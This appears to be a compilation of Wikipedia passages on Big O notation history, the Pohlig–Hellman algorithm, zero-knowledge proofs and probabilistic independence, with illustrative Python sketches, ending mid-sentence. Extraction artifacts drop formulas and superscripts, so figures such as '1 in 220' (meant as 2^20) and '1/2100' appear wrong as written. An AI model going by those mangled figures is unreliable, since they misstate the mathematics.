Hardy introduced the symbols ≼ and ≺ (as well as the already mentioned other symbols) in his 1910 tract "Orders of Infinity", and made use of them only in three papers (1910–1913). In his nearly 400 remaining papers and books he consistently used the Landau symbols O and o. Hardy's symbols ≼ and ≺ (as well as his barred ≍ symbol) are no longer used. On the other hand, in the 1930s,[43] the Russian number theorist Ivan Matveyevich Vinogradov introduced his notation ≪, which has been increasingly used in number theory instead of the O notation. We have f ≪ g if and only if f = O(g), and frequently both notations are used in the same paper. The big-O originally stands for "order of" ("Ordnung", Bachmann 1894), and is thus a Latin letter. Neither Bachmann nor Landau ever called it "omicron". The symbol was viewed much later (1976) by Knuth as a capital omicron,[26] probably in reference to his definition of the symbol Omega. The digit zero should not be used.

https://en.wikipedia.org/wiki/Big_Theta_notation
In group theory, the Pohlig–Hellman algorithm, sometimes credited as the Silver–Pohlig–Hellman algorithm,[1] is a special-purpose algorithm for computing discrete logarithms in a finite abelian group whose order is a smooth integer. The algorithm was introduced by Roland Silver, but first published by Stephen Pohlig and Martin Hellman, who credit Silver with its earlier independent but unpublished discovery. Pohlig and Hellman also list Richard Schroeppel and H. Block as having found the same algorithm, later than Silver, but again without publishing it.[2] As an important special case, which is used as a subroutine in the general algorithm (see below), the Pohlig–Hellman algorithm applies to groups whose order is a prime power. The basic idea of this algorithm is to iteratively compute the p-adic digits of the logarithm by repeatedly "shifting out" all but one unknown digit in the exponent, and computing that digit by elementary methods. (Note that for readability, the algorithm is stated for cyclic groups; in general, G must be replaced by the subgroup ⟨g⟩ generated by g, which is always cyclic.) The algorithm computes discrete logarithms in time complexity O(e√p), far better than the baby-step giant-step algorithm's O(√(p^e)) when e is large. In this section, we present the general case of the Pohlig–Hellman algorithm. The core ingredients are the algorithm from the previous section (to compute a logarithm modulo each prime power in the group order) and the Chinese remainder theorem (to combine these to a logarithm in the full group). (Again, we assume the group to be cyclic, with the understanding that a non-cyclic group must be replaced by the subgroup generated by the logarithm's base element.) The correctness of this algorithm can be verified via the classification of finite abelian groups: raising g and h to the power of n/p_i^{e_i} can be understood as the projection to the factor group of order p_i^{e_i}. The worst-case input for the Pohlig–Hellman algorithm is a group of prime order: in that case, it degrades to the baby-step giant-step algorithm, hence the worst-case time complexity is O(√n). However, it is much more efficient if the order is smooth: specifically, if ∏_i p_i^{e_i} is the prime factorization of n, then the algorithm's complexity is O(∑_i e_i (log n + √p_i)) group operations.[3]
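The following is a minimal Python sketch of this idea for the multiplicative group (Z/pZ)* (so n = p − 1), assuming the factorization of the group order is given. The function names bsgs and pohlig_hellman and the toy parameters p = 31, g = 3 are illustrative choices, not part of the original presentation:

```python
from math import isqrt

def bsgs(g, h, p, order):
    """Solve g^x = h (mod p) for 0 <= x < order by baby-step giant-step."""
    m = isqrt(order) + 1
    baby = {pow(g, j, p): j for j in range(m)}       # baby steps: g^j -> j
    giant = pow(g, -m, p)                            # g^(-m) mod p (Python 3.8+)
    gamma = h % p
    for i in range(m):
        if gamma in baby:
            return i * m + baby[gamma]
        gamma = gamma * giant % p
    raise ValueError("no discrete logarithm found")

def pohlig_hellman(g, h, p, factors):
    """Discrete log of h to base g in (Z/pZ)*, given the factorization
    factors = {q: e} of the group order n = p - 1 (assumed known)."""
    n = p - 1
    residues, moduli = [], []
    for q, e in factors.items():
        g_q = pow(g, n // q, p)                      # an element of order q
        x_qe = 0                                     # x mod q^e, built digit by digit
        for k in range(e):
            # strip the digits found so far, then push the remainder into the
            # order-q subgroup so only the next base-q digit is visible
            exp = n // q ** (k + 1)
            rhs = pow(h, exp, p) * pow(g, -x_qe * exp, p) % p
            digit = bsgs(g_q, rhs, p, q)
            x_qe += digit * q**k
        residues.append(x_qe)
        moduli.append(q**e)
    # Chinese remainder theorem: combine x mod q_i^{e_i} into x mod n.
    x = 0
    for r, m in zip(residues, moduli):
        M = n // m
        x = (x + r * M * pow(M, -1, m)) % n
    return x

# Tiny example: p = 31, group order 30 = 2 * 3 * 5, base g = 3.
p, g = 31, 3
h = pow(g, 17, p)
print(pohlig_hellman(g, h, p, {2: 1, 3: 1, 5: 1}))   # 17
```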
https://en.wikipedia.org/wiki/Pohlig–Hellman_algorithm
Incryptography, azero-knowledge proof(also known as aZK prooforZKP) is a protocol in which one party (the prover) can convince another party (the verifier) that some given statement is true, without conveying to the verifier any informationbeyondthe mere fact of that statement's truth.[1]The intuition underlying zero-knowledge proofs is that it is trivial to prove possession of the relevant information simply by revealing it; the hard part is to prove this possession without revealing this information (or any aspect of it whatsoever).[2] In light of the fact that one should be able to generate a proof of some statementonlywhen in possession of certain secret information connected to the statement, the verifier, even after having become convinced of the statement's truth, should nonetheless remain unable to prove the statement to further third parties. Zero-knowledge proofs can be interactive, meaning that the prover and verifier exchange messages according to some protocol, or noninteractive, meaning that the verifier is convinced by a single prover message and no other communication is needed. In thestandard model, interaction is required, except for trivial proofs ofBPPproblems.[3]In thecommon random stringandrandom oraclemodels,non-interactive zero-knowledge proofsexist. TheFiat–Shamir heuristiccan be used to transform certain interactive zero-knowledge proofs into noninteractive ones.[4][5][6] There is a well-known story presenting the fundamental ideas of zero-knowledge proofs, first published in 1990 byJean-Jacques Quisquaterand others in their paper "How to Explain Zero-Knowledge Protocols to Your Children".[7]The two parties in the zero-knowledge proof story arePeggyas the prover of the statement, andVictor, the verifier of the statement. In this story, Peggy has uncovered the secret word used to open a magic door in a cave. The cave is shaped like a ring, with the entrance on one side and the magic door blocking the opposite side. Victor wants to know whether Peggy knows the secret word; but Peggy, being a very private person, does not want to reveal her knowledge (the secret word) to Victor or to reveal the fact of her knowledge to the world in general. They label the left and right paths from the entrance A and B. First, Victor waits outside the cave as Peggy goes in. Peggy takes either path A or B; Victor is not allowed to see which path she takes. Then, Victor enters the cave and shouts the name of the path he wants her to use to return, either A or B, chosen at random. Providing she really does know the magic word, this is easy: she opens the door, if necessary, and returns along the desired path. However, suppose she did not know the word. Then, she would only be able to return by the named path if Victor were to give the name of the same path by which she had entered. Since Victor would choose A or B at random, she would have a 50% chance of guessing correctly. If they were to repeat this trick many times, say 20 times in a row, her chance of successfully anticipating all of Victor's requests would be reduced to 1 in 220, or 9.54×10−7. Thus, if Peggy repeatedly appears at the exit Victor names, then he can conclude that it is extremely probable that Peggy does, in fact, know the secret word. One side note with respect to third-party observers: even if Victor is wearing a hidden camera that records the whole transaction, the only thing the camera will record is in one case Victor shouting "A!" and Peggy appearing at A or in the other case Victor shouting "B!" 
and Peggy appearing at B. A recording of this type would be trivial for any two people to fake (requiring only that Peggy and Victor agree beforehand on the sequence of As and Bs that Victor will shout). Such a recording will certainly never be convincing to anyone but the original participants. In fact, even a person who was present as an observer at the original experiment should be unconvinced, since Victor and Peggy could have orchestrated the whole "experiment" from start to finish. Further, if Victor chooses his As and Bs by flipping a coin on-camera, this protocol loses its zero-knowledge property; the on-camera coin flip would probably be convincing to any person watching the recording later. Thus, although this does not reveal the secret word to Victor, it does make it possible for Victor to convince the world in general that Peggy has that knowledge—counter to Peggy's stated wishes. However, digital cryptography generally "flips coins" by relying on apseudo-random number generator, which is akin to a coin with a fixed pattern of heads and tails known only to the coin's owner. If Victor's coin behaved this way, then again it would be possible for Victor and Peggy to have faked the experiment, so using a pseudo-random number generator would not reveal Peggy's knowledge to the world in the same way that using a flipped coin would. Peggy could prove to Victor that she knows the magic word, without revealing it to him, in a single trial. If both Victor and Peggy go together to the mouth of the cave, Victor can watch Peggy go in through A and come out through B. This would prove with certainty that Peggy knows the magic word, without revealing the magic word to Victor. However, such a proof could be observed by a third party, or recorded by Victor and such a proof would be convincing to anybody. In other words, Peggy could not refute such proof by claiming she colluded with Victor, and she is therefore no longer in control of who is aware of her knowledge. Imagine your friend "Victor" is red-greencolour-blind(while you are not) and you have two balls: one red and one green, but otherwise identical. To Victor, the balls seem completely identical. Victor is skeptical that the balls are actually distinguishable. You want toprove to Victor that the balls are in fact differently coloured, but nothing else. In particular, you do not want to reveal which ball is the red one and which is the green. Here is the proof system: You give the two balls to Victor and he puts them behind his back. Next, he takes one of the balls and brings it out from behind his back and displays it. He then places it behind his back again and then chooses to reveal just one of the two balls, picking one of the two at random with equal probability. He will ask you, "Did I switch the ball?" This whole procedure is then repeated as often as necessary. By looking at the balls' colours, you can, of course, say with certainty whether or not he switched them. On the other hand, if the balls were the same colour and hence indistinguishable, your ability to determine whether a switch occurred would be no better than random guessing. Since the probability that you would have randomly succeeded at identifying each switch/non-switch is 50%, the probability of having randomly succeeded atallswitch/non-switches approaches zero. Over multiple trials, the success rate wouldstatistically convergeto 50%, and you could not achieve a performance significantly better than chance. 
If you and your friend repeat this "proof" multiple times (e.g. 20 times), your friend should become convinced that the balls are indeed differently coloured. The above proof iszero-knowledgebecause your friend never learns which ball is green and which is red; indeed, he gains no knowledge about how to distinguish the balls.[8] One well-known example of a zero-knowledge proof is the "Where's Wally" example. In this example, the prover wants to prove to the verifier that they know where Wally is on a page in aWhere's Wally?book, without revealing his location to the verifier.[9] The prover starts by taking a large black board with a small hole in it, the size of Wally. The board is twice the size of the book in both directions, so the verifier cannot see where on the page the prover is placing it. The prover then places the board over the page so that Wally is in the hole.[9] The verifier can now look through the hole and see Wally, but cannot see any other part of the page. Therefore, the prover has proven to the verifier that they know where Wally is, without revealing any other information about his location.[9] This example is not a perfect zero-knowledge proof, because the prover does reveal some information about Wally's location, such as his body position. However, it is a decent illustration of the basic concept of a zero-knowledge proof. A zero-knowledge proof of some statement must satisfy three properties: The first two of these are properties of more generalinteractive proof systems. The third is what makes the proof zero-knowledge.[10] Zero-knowledge proofs are not proofs in the mathematical sense of the term because there is some small probability, thesoundness error, that a cheating prover will be able to convince the verifier of a false statement. In other words, zero-knowledge proofs are probabilistic "proofs" rather than deterministic proofs. However, there are techniques to decrease the soundness error to negligibly small values (for example, guessing correctly on a hundred or thousand binary decisions has a 1/2100or 1/21000soundness error, respectively. As the number of bits increases, the soundness error decreases toward zero). A formal definition of zero-knowledge must use some computational model, the most common one being that of aTuring machine. LetP,V, andSbe Turing machines. Aninteractive proof systemwith(P,V)for a languageLis zero-knowledge if for anyprobabilistic polynomial time(PPT) verifierV^{\displaystyle {\hat {V}}}there exists a PPT simulatorSsuch that: whereViewV^{\displaystyle {\hat {V}}}[P(x)↔V^{\displaystyle {\hat {V}}}(x,z)]is a record of the interactions betweenP(x)andV(x,z). The proverPis modeled as having unlimited computation power (in practice,Pusually is aprobabilistic Turing machine). Intuitively, the definition states that an interactive proof system(P,V)is zero-knowledge if for any verifierV^{\displaystyle {\hat {V}}}there exists an efficient simulatorS(depending onV^{\displaystyle {\hat {V}}}) that can reproduce the conversation betweenPandV^{\displaystyle {\hat {V}}}on any given input. The auxiliary stringzin the definition plays the role of "prior knowledge" (including the random coins ofV^{\displaystyle {\hat {V}}}). 
The definition implies thatV^{\displaystyle {\hat {V}}}cannot use any prior knowledge stringzto mine information out of its conversation withP, because ifSis also given this prior knowledge then it can reproduce the conversation betweenV^{\displaystyle {\hat {V}}}andPjust as before.[citation needed] The definition given is that of perfect zero-knowledge. Computational zero-knowledge is obtained by requiring that the views of the verifierV^{\displaystyle {\hat {V}}}and the simulator are onlycomputationally indistinguishable, given the auxiliary string.[citation needed] These ideas can be applied to a more realistic cryptography application. Peggy wants to prove to Victor that she knows thediscrete logarithmof a given value in a givengroup.[11] For example, given a valuey, a largeprimep, and a generatorg{\displaystyle g}, she wants to prove that she knows a valuexsuch thatgx≡y(modp), without revealingx. Indeed, knowledge ofxcould be used as a proof of identity, in that Peggy could have such knowledge because she chose a random valuexthat she did not reveal to anyone, computedy=gxmodp, and distributed the value ofyto all potential verifiers, such that at a later time, proving knowledge ofxis equivalent to proving identity as Peggy. The protocol proceeds as follows: in each round, Peggy generates a random numberr, computesC=grmodpand discloses this to Victor. After receivingC, Victor randomly issues one of the following two requests: he either requests that Peggy discloses the value ofr, or the value of(x+r) mod (p− 1). Victor can verify either answer; if he requestedr, he can then computegrmodpand verify that it matchesC. If he requested(x+r) mod (p− 1), then he can verify thatCis consistent with this, by computingg(x+r) mod (p− 1)modpand verifying that it matches(C·y) modp. If Peggy indeed knows the value ofx, then she can respond to either one of Victor's possible challenges. If Peggy knew or could guess which challenge Victor is going to issue, then she could easily cheat and convince Victor that she knowsxwhen she does not: if she knows that Victor is going to requestr, then she proceeds normally: she picksr, computesC=grmodp, and disclosesCto Victor; she will be able to respond to Victor's challenge. On the other hand, if she knows that Victor will request(x+r) mod (p− 1), then she picks a random valuer′, computesC′ ≡gr′· (gx)−1modp, and disclosesC′to Victor as the value ofCthat he is expecting. When Victor challenges her to reveal(x+r) mod (p− 1), she revealsr′, for which Victor will verify consistency, since he will in turn computegr′modp, which matchesC′ ·y, since Peggy multiplied by themodular multiplicative inverseofy. However, if in either one of the above scenarios Victor issues a challenge other than the one she was expecting and for which she manufactured the result, then she will be unable to respond to the challenge under the assumption of infeasibility of solving the discrete log for this group. If she pickedrand disclosedC=grmodp, then she will be unable to produce a valid(x+r) mod (p− 1)that would pass Victor's verification, given that she does not knowx. And if she picked a valuer′that poses as(x+r) mod (p− 1), then she would have to respond with the discrete log of the value that she disclosed – but Peggy does not know this discrete log, since the valueCshe disclosed was obtained through arithmetic with known values, and not by computing a power with a known exponent. Thus, a cheating prover has a 0.5 probability of successfully cheating in one round. 
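A minimal simulation of the rounds described above, with assumed toy parameters (p = 1019, g = 2, secret x = 357) that are far too small for real security, shows an honest prover always passing and a cheating prover passing roughly half the time per round:

```python
import random

p = 1019                      # small prime (toy parameter, insecure)
g = 2                         # assumed base for illustration
x = 357                       # Peggy's secret exponent
y = pow(g, x, p)              # public value y = g^x mod p

def honest_round():
    r = random.randrange(p - 1)
    C = pow(g, r, p)                          # Peggy's commitment
    challenge = random.choice(("r", "x+r"))   # Victor's random request
    if challenge == "r":
        return pow(g, r, p) == C              # Victor checks g^r = C
    s = (x + r) % (p - 1)
    return pow(g, s, p) == C * y % p          # Victor checks g^(x+r) = C*y

def cheating_round():
    """Peggy does not use x; she guesses the challenge in advance."""
    guess = random.choice(("r", "x+r"))
    if guess == "r":
        r = random.randrange(p - 1)
        C = pow(g, r, p)
    else:
        r_prime = random.randrange(p - 1)
        C = pow(g, r_prime, p) * pow(y, -1, p) % p    # C' = g^r' * y^(-1)
    challenge = random.choice(("r", "x+r"))
    if challenge != guess:
        return False                          # caught: cannot answer this challenge
    if challenge == "r":
        return pow(g, r, p) == C
    return pow(g, r_prime, p) == C * y % p

print(all(honest_round() for _ in range(20)))                    # True
trials = 10_000
print(sum(cheating_round() for _ in range(trials)) / trials)     # ~0.5 per round
```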
By executing a large-enough number of rounds, the probability of a cheating prover succeeding can be made arbitrarily low. To show that the above interactive proof gives zero knowledge other than the fact that Peggy knowsx, one can use similar arguments as used in the above proof of completeness and soundness. Specifically, a simulator, say Simon, who does not knowx, can simulate the exchange between Peggy and Victor by the following procedure. Firstly, Simon randomly flips a fair coin. If the result is "heads", then he picks a random valuer, computesC=grmodp, and disclosesCas if it is a message from Peggy to Victor. Then Simon also outputs a message "request the value ofr" as if it is sent from Victor to Peggy, and immediately outputs the value ofras if it is sent from Peggy to Victor. A single round is complete. On the other hand, if the coin flipping result is "tails", then Simon picks a random numberr′, computesC′ =gr′·y−1modp, and disclosesC′as if it is a message from Peggy to Victor. Then Simon outputs "request the value of(x+r) mod (p− 1)" as if it is a message from Victor to Peggy. Finally, Simon outputs the value ofr′as if it is the response from Peggy back to Victor. A single round is complete. By the previous arguments when proving the completeness and soundness, the interactive communication simulated by Simon is indistinguishable from the true correspondence between Peggy and Victor. The zero-knowledge property is thus guaranteed. The following scheme is due toManuel Blum.[12] In this scenario, Peggy knows aHamiltonian cyclefor a largegraphG. Victor knowsGbut not the cycle (e.g., Peggy has generatedGand revealed it to him.) Finding a Hamiltonian cycle given a large graph is believed to be computationally infeasible, since its corresponding decision version is known to beNP-complete. Peggy will prove that she knows the cycle without simply revealing it (perhaps Victor is interested in buying it but wants verification first, or maybe Peggy is the only one who knows this information and is proving her identity to Victor). To show that Peggy knows this Hamiltonian cycle, she and Victor play several rounds of a game: It is important that the commitment to the graph be such that Victor can verify, in the second case, that the cycle is really made of edges fromH. This can be done by, for example, committing to every edge (or lack thereof) separately. If Peggy does know a Hamiltonian cycle inG, then she can easily satisfy Victor's demand for either the graph isomorphism producingHfromG(which she had committed to in the first step) or a Hamiltonian cycle inH(which she can construct by applying the isomorphism to the cycle inG). Peggy's answers do not reveal the original Hamiltonian cycle inG. In each round, Victor will learn onlyH's isomorphism toGor a Hamiltonian cycle inH. He would need both answers for a singleHto discover the cycle inG, so the information remains unknown as long as Peggy can generate a distinctHevery round. If Peggy does not know of a Hamiltonian cycle inG, but somehow knew in advance what Victor would ask to see each round, then she could cheat. For example, if Peggy knew ahead of time that Victor would ask to see the Hamiltonian cycle inH, then she could generate a Hamiltonian cycle for an unrelated graph. Similarly, if Peggy knew in advance that Victor would ask to see the isomorphism then she could simply generate an isomorphic graphH(in which she also does not know a Hamiltonian cycle). 
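The simulator can be sketched in the same toy setting (same assumed parameters as the previous sketch). Note that simulated_round never uses x, yet its transcripts pass Victor's check just like the real ones, which is the intuition behind the zero-knowledge property:

```python
import random

p, g = 1019, 2
x = 357                       # known only to Peggy; NOT used by the simulator
y = pow(g, x, p)

def real_round():
    r = random.randrange(p - 1)
    C = pow(g, r, p)
    ch = random.choice(("r", "x+r"))
    resp = r if ch == "r" else (x + r) % (p - 1)
    return C, ch, resp

def simulated_round():
    coin = random.choice(("heads", "tails"))
    if coin == "heads":                               # pretend Victor asks for r
        r = random.randrange(p - 1)
        return pow(g, r, p), "r", r
    r_prime = random.randrange(p - 1)                 # pretend Victor asks for x+r
    C = pow(g, r_prime, p) * pow(y, -1, p) % p
    return C, "x+r", r_prime

def verifies(C, ch, resp):
    if ch == "r":
        return pow(g, resp, p) == C
    return pow(g, resp, p) == C * y % p

# Both kinds of transcript pass Victor's verification.
print(all(verifies(*real_round()) for _ in range(1000)))        # True
print(all(verifies(*simulated_round()) for _ in range(1000)))   # True
```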
Victor could simulate the protocol by himself (without Peggy) because he knows what he will ask to see. Therefore, Victor gains no information about the Hamiltonian cycle inGfrom the information revealed in each round. If Peggy does not know the information, then she can guess which question Victor will ask and generate either a graph isomorphic toGor a Hamiltonian cycle for an unrelated graph, but since she does not know a Hamiltonian cycle forG, she cannot do both. With this guesswork, her chance of fooling Victor is2−n, wherenis the number of rounds. For all realistic purposes, it is infeasibly difficult to defeat a zero-knowledge proof with a reasonable number of rounds in this way. Different variants of zero-knowledge can be defined by formalizing the intuitive concept of what is meant by the output of the simulator "looking like" the execution of the real proof protocol in the following ways: There are various types of zero-knowledge proofs: Zero-knowledge proof schemes can be constructed from various cryptographic primitives, such ashash-based cryptography,pairing-based cryptography,multi-party computation, orlattice-based cryptography. Research in zero-knowledge proofs has been motivated byauthenticationsystems where one party wants to prove its identity to a second party via some secret information (such as a password) but does not want the second party to learn anything about this secret. This is called a "zero-knowledgeproof of knowledge". However, a password is typically too small or insufficiently random to be used in many schemes for zero-knowledge proofs of knowledge. Azero-knowledge password proofis a special kind of zero-knowledge proof of knowledge that addresses the limited size of passwords.[citation needed] In April 2015, the one-out-of-many proofs protocol (aSigma protocol) was introduced.[14]In August 2021,Cloudflare, an American web infrastructure and security company, decided to use the one-out-of-many proofs mechanism for private web verification using vendor hardware.[15] One of the uses of zero-knowledge proofs within cryptographic protocols is to enforce honest behavior while maintaining privacy. Roughly, the idea is to force a user to prove, using a zero-knowledge proof, that its behavior is correct according to the protocol.[16][17]Because of soundness, we know that the user must really act honestly in order to be able to provide a valid proof. Because of zero knowledge, we know that the user does not compromise the privacy of its secrets in the process of providing the proof.[citation needed] In 2016, thePrinceton Plasma Physics LaboratoryandPrinceton Universitydemonstrated a technique that may have applicability to futurenuclear disarmamenttalks. It would allow inspectors to confirm whether or not an object is indeed a nuclear weapon without recording, sharing, or revealing the internal workings, which might be secret.[18] Zero-knowledge proofs were applied in theZerocoinand Zerocash protocols, which culminated in the birth ofZcoin[19](later rebranded asFiroin 2020)[20]andZcashcryptocurrencies in 2016. Zerocoin has a built-in mixing model that does not trust any peers or centralised mixing providers to ensure anonymity.[19]Users can transact in a base currency and can cycle the currency into and out of Zerocoins.[21]The Zerocash protocol uses a similar model (a variant known as anon-interactive zero-knowledge proof)[22]except that it can obscure the transaction amount, while Zerocoin cannot. 
Given significant restrictions of transaction data on the Zerocash network, Zerocash is less prone to privacy timing attacks when compared to Zerocoin. However, this additional layer of privacy can cause potentially undetected hyperinflation of Zerocash supply because fraudulent coins cannot be tracked.[19][23] In 2018, Bulletproofs were introduced. Bulletproofs are an improvement from non-interactive zero-knowledge proofs where a trusted setup is not needed.[24]It was later implemented into theMimblewimbleprotocol (which the Grin and Beam cryptocurrencies are based upon) andMonero cryptocurrency.[25]In 2019, Firo implemented the Sigma protocol, which is an improvement on the Zerocoin protocol without trusted setup.[26][14]In the same year, Firo introduced the Lelantus protocol, an improvement on the Sigma protocol, where the former hides the origin and amount of a transaction.[27] Zero-knowledge proofs by their nature can enhance privacy in identity-sharing systems, which are vulnerable to data breaches and identity theft. When integrated to adecentralized identifiersystem, ZKPs add an extra layer of encryption on DID documents.[28] Zero-knowledge proofs were first conceived in 1985 byShafi Goldwasser,Silvio Micali, andCharles Rackoffin their paper "The Knowledge Complexity of Interactive Proof-Systems".[16]This paper introduced the IP hierarchy of interactive proof systems (seeinteractive proof system) and conceived the concept ofknowledge complexity, a measurement of the amount of knowledge about the proof transferred from the prover to the verifier. They also gave the first zero-knowledge proof for a concrete problem, that of decidingquadratic nonresiduesmodm. Together with a paper byLászló BabaiandShlomo Moran, this landmark paper invented interactive proof systems, for which all five authors won the firstGödel Prizein 1993. In their own words, Goldwasser, Micali, and Rackoff say: Of particular interest is the case where this additional knowledge is essentially 0 and we show that [it] is possible to interactively prove that a number is quadratic non residue modmreleasing 0 additional knowledge. This is surprising as no efficient algorithm for deciding quadratic residuosity modmis known whenm’s factorization is not given. Moreover, all knownNPproofs for this problem exhibit the prime factorization ofm. This indicates that adding interaction to the proving process, may decrease the amount of knowledge that must be communicated in order to prove a theorem. The quadratic nonresidue problem has both anNPand aco-NPalgorithm, and so lies in the intersection of NP and co-NP. This was also true of several other problems for which zero-knowledge proofs were subsequently discovered, such as an unpublished proof system by Oded Goldreich verifying that a two-prime modulus is not aBlum integer.[29] Oded Goldreich,Silvio Micali, andAvi Wigdersontook this one step further, showing that, assuming the existence of unbreakable encryption, one can create a zero-knowledge proof system for the NP-completegraph coloring problemwith three colors. Since every problem in NP can be efficiently reduced to this problem, this means that, under this assumption, all problems in NP have zero-knowledge proofs.[30]The reason for the assumption is that, as in the above example, their protocols require encryption. A commonly cited sufficient condition for the existence of unbreakable encryption is the existence ofone-way functions, but it is conceivable that some physical means might also achieve it. 
On top of this, they also showed that thegraph nonisomorphism problem, thecomplementof thegraph isomorphism problem, has a zero-knowledge proof. This problem is in co-NP, but is not currently known to be in either NP or any practical class. More generally,Russell ImpagliazzoandMoti Yungas well as Ben-Or et al. would go on to show that, also assuming one-way functions or unbreakable encryption, there are zero-knowledge proofs forallproblems in IP = PSPACE, or in other words, anything that can be proved by an interactive proof system can be proved with zero knowledge.[31][32] Not liking to make unnecessary assumptions, many theorists sought a way to eliminate the necessity ofone way functions. One way this was done was withmulti-prover interactive proof systems(seeinteractive proof system), which have multiple independent provers instead of only one, allowing the verifier to "cross-examine" the provers in isolation to avoid being misled. It can be shown that, without any intractability assumptions, all languages in NP have zero-knowledge proofs in such a system.[33] It turns out that, in an Internet-like setting, where multiple protocols may be executed concurrently, building zero-knowledge proofs is more challenging. The line of research investigating concurrent zero-knowledge proofs was initiated by the work ofDwork,Naor, andSahai.[34]One particular development along these lines has been the development ofwitness-indistinguishable proofprotocols. The property of witness-indistinguishability is related to that of zero-knowledge, yet witness-indistinguishable protocols do not suffer from the same problems of concurrent execution.[35] Another variant of zero-knowledge proofs arenon-interactive zero-knowledge proofs. Blum, Feldman, and Micali showed that a common random string shared between the prover and the verifier is enough to achieve computational zero-knowledge without requiring interaction.[5][6] The most popular interactive ornon-interactive zero-knowledge proof(e.g., zk-SNARK) protocols can be broadly categorized in the following four categories: Succinct Non-Interactive ARguments of Knowledge (SNARK), Scalable Transparent ARgument of Knowledge (STARK), Verifiable Polynomial Delegation (VPD), and Succinct Non-interactive ARGuments (SNARG). A list of zero-knowledge proof protocols and libraries is provided below along with comparisons based ontransparency,universality,plausible post-quantum security, andprogramming paradigm.[36]A transparent protocol is one that does not require any trusted setup and uses public randomness. A universal protocol is one that does not require a separate trusted setup for each circuit. Finally, a plausibly post-quantum protocol is one that is not susceptible to known attacks involving quantum algorithms. While zero-knowledge proofs offer a secure way to verify information, the arithmetic circuits that implement them must be carefully designed. If these circuits lack sufficient constraints, they may introduce subtle yet critical security vulnerabilities. One of the most common classes of vulnerabilities in these systems is under-constrained logic, where insufficient constraints allow a malicious prover to produce a proof for an incorrect statement that still passes verification. 
A 2024 systematization of known attacks found that approximately 96% of documented circuit-layer bugs in SNARK-based systems were due to under-constrained circuits.[56] These vulnerabilities often arise during the translation of high-level logic into low-level constraint systems, particularly when using domain-specific languages such as Circom or Gnark. Recent research has demonstrated that formally proving determinism – ensuring that a circuit's outputs are uniquely determined by its inputs – can eliminate entire classes of these vulnerabilities.[57]
https://en.wikipedia.org/wiki/Zero-knowledge_proof
Independenceis a fundamental notion inprobability theory, as instatisticsand the theory ofstochastic processes. Twoeventsareindependent,statistically independent, orstochastically independent[1]if, informally speaking, the occurrence of one does not affect the probability of occurrence of the other or, equivalently, does not affect theodds. Similarly, tworandom variablesare independent if the realization of one does not affect theprobability distributionof the other. When dealing with collections of more than two events, two notions of independence need to be distinguished. The events are calledpairwise independentif any two events in the collection are independent of each other, whilemutual independence(orcollective independence) of events means, informally speaking, that each event is independent of any combination of other events in the collection. A similar notion exists for collections of random variables. Mutual independence implies pairwise independence, but not the other way around. In the standard literature of probability theory, statistics, and stochastic processes,independencewithout further qualification usually refers to mutual independence. Two eventsA{\displaystyle A}andB{\displaystyle B}are independent (often written asA⊥B{\displaystyle A\perp B}orA⊥⊥B{\displaystyle A\perp \!\!\!\perp B}, where the latter symbol often is also used forconditional independence) if and only if theirjoint probabilityequals the product of their probabilities:[2]: p. 29[3]: p. 10 A∩B≠∅{\displaystyle A\cap B\neq \emptyset }indicates that two independent eventsA{\displaystyle A}andB{\displaystyle B}have common elements in theirsample spaceso that they are notmutually exclusive(mutually exclusive iffA∩B=∅{\displaystyle A\cap B=\emptyset }). Why this defines independence is made clear by rewriting withconditional probabilitiesP(A∣B)=P(A∩B)P(B){\displaystyle P(A\mid B)={\frac {P(A\cap B)}{P(B)}}}as the probability at which the eventA{\displaystyle A}occurs provided that the eventB{\displaystyle B}has or is assumed to have occurred: and similarly Thus, the occurrence ofB{\displaystyle B}does not affect the probability ofA{\displaystyle A}, and vice versa. In other words,A{\displaystyle A}andB{\displaystyle B}are independent of each other. Although the derived expressions may seem more intuitive, they are not the preferred definition, as the conditional probabilities may be undefined ifP(A){\displaystyle \mathrm {P} (A)}orP(B){\displaystyle \mathrm {P} (B)}are 0. Furthermore, the preferred definition makes clear by symmetry that whenA{\displaystyle A}is independent ofB{\displaystyle B},B{\displaystyle B}is also independent ofA{\displaystyle A}. Stated in terms ofodds, two events are independent if and only if theodds ratioof⁠A{\displaystyle A}⁠and⁠B{\displaystyle B}⁠is unity (1). Analogously with probability, this is equivalent to the conditional odds being equal to the unconditional odds: or to the odds of one event, given the other event, being the same as the odds of the event, given the other event not occurring: The odds ratio can be defined as or symmetrically for odds of⁠B{\displaystyle B}⁠given⁠A{\displaystyle A}⁠, and thus is 1 if and only if the events are independent. 
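A small Monte Carlo sketch of this definition, using the dice events that appear later in this article (the sample size and seed are arbitrary choices of this illustration):

```python
import random

random.seed(0)
N = 200_000
first_six = both_six = sum_eight = six_and_eight = second_six = 0

for _ in range(N):
    d1, d2 = random.randint(1, 6), random.randint(1, 6)
    a, b, c = d1 == 6, d2 == 6, d1 + d2 == 8
    first_six += a
    second_six += b
    both_six += a and b
    sum_eight += c
    six_and_eight += a and c

pA, pB, pC = first_six / N, second_six / N, sum_eight / N
print(both_six / N, pA * pB)        # close: the two rolls are independent
print(six_and_eight / N, pA * pC)   # not close: 1/36 vs (1/6)*(5/36), dependent events
```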
A finite set of events{Ai}i=1n{\displaystyle \{A_{i}\}_{i=1}^{n}}ispairwise independentif every pair of events is independent[4]—that is, if and only if for all distinct pairs of indicesm,k{\displaystyle m,k}, A finite set of events ismutually independentif every event is independent of any intersection of the other events[4][3]: p. 11—that is, if and only if for everyk≤n{\displaystyle k\leq n}and for every k indices1≤i1<⋯<ik≤n{\displaystyle 1\leq i_{1}<\dots <i_{k}\leq n}, This is called themultiplication rulefor independent events. It isnot a single conditioninvolving only the product of all the probabilities of all single events; it must hold true for all subsets of events. For more than two events, a mutually independent set of events is (by definition) pairwise independent; but the converse isnot necessarily true.[2]: p. 30 Stated in terms oflog probability, two events are independent if and only if the log probability of the joint event is the sum of the log probability of the individual events: Ininformation theory, negative log probability is interpreted asinformation content, and thus two events are independent if and only if the information content of the combined event equals the sum of information content of the individual events: SeeInformation content § Additivity of independent eventsfor details. Two random variablesX{\displaystyle X}andY{\displaystyle Y}are independentif and only if(iff) the elements of theπ-systemgenerated by them are independent; that is to say, for everyx{\displaystyle x}andy{\displaystyle y}, the events{X≤x}{\displaystyle \{X\leq x\}}and{Y≤y}{\displaystyle \{Y\leq y\}}are independent events (as defined above inEq.1). That is,X{\displaystyle X}andY{\displaystyle Y}withcumulative distribution functionsFX(x){\displaystyle F_{X}(x)}andFY(y){\displaystyle F_{Y}(y)}, are independentiffthe combined random variable(X,Y){\displaystyle (X,Y)}has ajointcumulative distribution 